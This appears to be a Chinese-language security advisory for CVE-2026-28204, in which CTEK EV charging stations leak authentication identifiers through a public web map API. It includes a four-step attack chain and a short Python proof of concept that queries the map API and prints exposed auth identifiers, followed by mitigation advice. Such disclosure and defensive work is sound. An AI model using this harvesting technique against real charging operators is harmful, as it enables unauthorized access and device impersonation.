CVE-2026-28204 CVSS 6.5 中危

CVE-2026-28204 充电站认证标识符信息泄露漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28204

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CTEK Charging Stations

漏洞概述

该漏洞存在于特定电动汽车充电站系统中。由于配置不当，充电站的敏感认证标识符通过基于Web的地图平台意外公开。未经身份验证的攻击者可以利用此漏洞，远程获取这些标识符，从而可能导致未授权的充电服务访问或其他安全风险。

技术细节

该漏洞源于充电站管理系统与公共Web地图接口之间的数据过滤机制缺失。当Web地图平台请求充电站位置数据以在界面上展示时，后端服务器在响应中错误地包含了用于身份验证的敏感标识符（如内部ID、API密钥或序列号）。攻击者无需任何用户交互或特权账号，只需向地图API端点发送常规网络请求，即可在返回的JSON数据包或HTML源码中检索到这些凭证。由于CVSS向量显示攻击复杂度低且无需认证，攻击者可轻易编写自动化脚本大规模扫描并收集受影响设备的认证信息，进而利用这些凭证模拟合法设备或用户进行后续攻击。

攻击链分析

STEP 1

侦察

攻击者发现目标充电站运营商使用的公共Web地图平台。

STEP 2

流量分析

攻击者使用浏览器开发者工具或代理工具（如Burp Suite）拦截地图平台加载充电站数据时的网络请求。

STEP 3

数据提取

攻击者分析API响应，发现其中包含了原本不应公开的充电站认证标识符。

STEP 4

利用

攻击者编写脚本批量调用该API，收集所有泄露的认证ID，用于未授权访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-28204: Authentication Identifier Leak via Web Map
# This script demonstrates how to extract sensitive IDs from a public map API.

import requests
import json

def check_map_leak(map_api_url):
    try:
        # Send a request to the public mapping platform API
        response = requests.get(map_api_url)
        
        if response.status_code == 200:
            data = response.json()
            
            # Iterate through stations to find exposed authentication identifiers
            for station in data.get('stations', []):
                station_id = station.get('id')
                auth_id = station.get('auth_identifier') # The sensitive field
                
                if auth_id:
                    print(f"[+] Vulnerability Found!")
                    print(f"    Station ID: {station_id}")
                    print(f"    Leaked Auth ID: {auth_id}")
        else:
            print("[-] Failed to retrieve data from the map API.")
            
    except Exception as e:
        print(f"[-] Error: {e}")

# Example usage (replace with actual target endpoint)
# target_url = "https://api.example-charging-map.com/v1/stations"
# check_map_leak(target_url)

影响范围

CTEK Charging Station (Specific versions prior to fix, refer to ICSA-26-078-06)

防御指南

临时缓解措施

建议立即检查Web地图平台的API数据输出，移除其中的认证标识符字段；如果无法立即修复，可考虑暂时关闭公共地图查询功能，直到补丁部署完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表